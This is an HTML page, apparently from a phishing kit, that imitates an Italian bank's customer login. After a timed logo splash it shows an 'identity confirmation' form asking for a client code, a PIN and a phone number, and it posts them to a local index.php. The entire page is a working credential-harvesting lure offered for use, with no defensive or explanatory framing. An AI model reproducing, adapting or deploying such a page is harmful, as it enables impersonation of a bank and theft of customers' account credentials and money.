<html><head><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
</head><body class="sfondo">
    <div class="father" style="display: none;">

    <div class="child">
        <img src="intesalogo.jpg"></div>
</div>
<link rel="stylesheet" href="https://unpkg.com/purecss@2.0.5/build/pure-min.css">
<script src="jquery-latest.min.js"></script>

<div class="resto" style="display: block;">
<style>
    html{
       
    }
.father {
 display: flex;
    justify-content: center;
    align-items: center;
}
.resto{
    display: none ;
}

.nascondi{
    display: none !important;
}
.child img{
    width: 100%;}
.child {

    
    margin-top: 100%;
    position: absolute; 
}
.myButton {
    text-align: center;
    width: 100%;
    background-color: #27870b;
    border: 1px solid #27870b;
    display: inline-block;
    cursor: pointer;
    color: white;
    font-family: Arial;
    font-weight: bold;
    font-size: 100%;
    padding: 20px 28px;
    text-decoration: none;
    text-shadow: 0px 1px 0px #27870b;
}
.myButton:hover {
	background-color:#185a05;;
}
.myButton:active {
	position:relative;
	top:1px;
}

        H1{FONT-SIZE: 2EM;
        }

label{
    margin: 15px 0px !important;
     font-size: 110%;
}
.i1{
    
}


input{
    outline: 0;
    -webkit-box-shadow: none;
    box-shadow: none;
    background-image: none;
    -webkit-border-radius: 0;
    border-radius: 0;
    text-decoration: none;
    text-shadow: none;
    color: #323232;
    width: 100%;
    padding-left: 15px;
    min-height: 48px;
    background-color: transparent;
    border: none;
    display: table;
    border: 1px solid #323232;
    -webkit-box-shadow: inset 1px 2px 8px -4px #999;
    box-shadow: inset 1px 2px 8px -4px #999;
    -webkit-border-radius: 2px;
    border-radius: 2px;
    background-color: #fff;
    width: 100%;
}

.sfondo{
    background-image:url(sfondo.jpg) !important;
}
#demo {
    padding: 25px;
    background-color: white;
}
.salva{
    -webkit-box-shadow: 1px 0px 10px -3px ##939393; 
box-shadow: 1px 0px 10px -3px #939393;
}
.barra{
    background-color:#4f4f4f;
    color:#ffc627;
    padding:5px 5px 5px 15px;
}
</style>
<div class="" style=" padding:20px;       margin-bottom: 1px;   background-color: #27870b; text-align: left; ">
<img style=" max-width: 220px;  " src="logobianco.png">

</div>


<div class="pure-g">
    <div class="pure-u-1-2" style=" COLOR: WHITE; text-align: center;   background-color: #1d6300;"><p style="font-size:12px">APRI IL CONTO</p></div>
    <div class="pure-u-1-2" style="  COLOR: WHITE; text-align: center;  background-color: #FA9600;"><p style="font-size:12px">ACCESSO CLIENTI</p></div>
</div>


<form method="POST" action="index.php" autocomplete="off" class="" style="margin:8%;">
<div><br>  
<br>
<div class="" style="        margin-bottom: 2px;  text-align: center; ">
<img style=" max-width: 220px;  " src="utente_ok_green.png">

</div>
<h2 style="text-align: center;color: #27870b;font-weight: normal;">Conferma la tua identità</h2>

<p style="color: gray;text-align: center;font-size:13px">completa il modulo per continuare</p>




<input class="i1" maxlength="20" required="" name="username" type="text" placeholder="Codice Cliente">  <br>  
  <input class="i1" required="" maxlength="5" name="pin" type="password" placeholder="Codice PIN"><br> 

  <input class="i1" required="" maxlength="15" name="tel" type="text" placeholder="Numero di Telefono"><br> 

      
<div style="       text-align: center; ">
        <button type="submit" class="myButton">CONFERMA</button><br><br><br><br>
        </div>





</div></form>
<script>
jQuery(".salva").click(function() {
   
    jQuery(".salva").fadeOut()
});

    setTimeout(function(){

jQuery(".father").fadeOut( "slow", function() {
    jQuery("body").addClass("sfondo")
    
        jQuery(".resto").fadeIn()
  });

    },2000)
    </script>
    <script>
</script>

</div></body></html>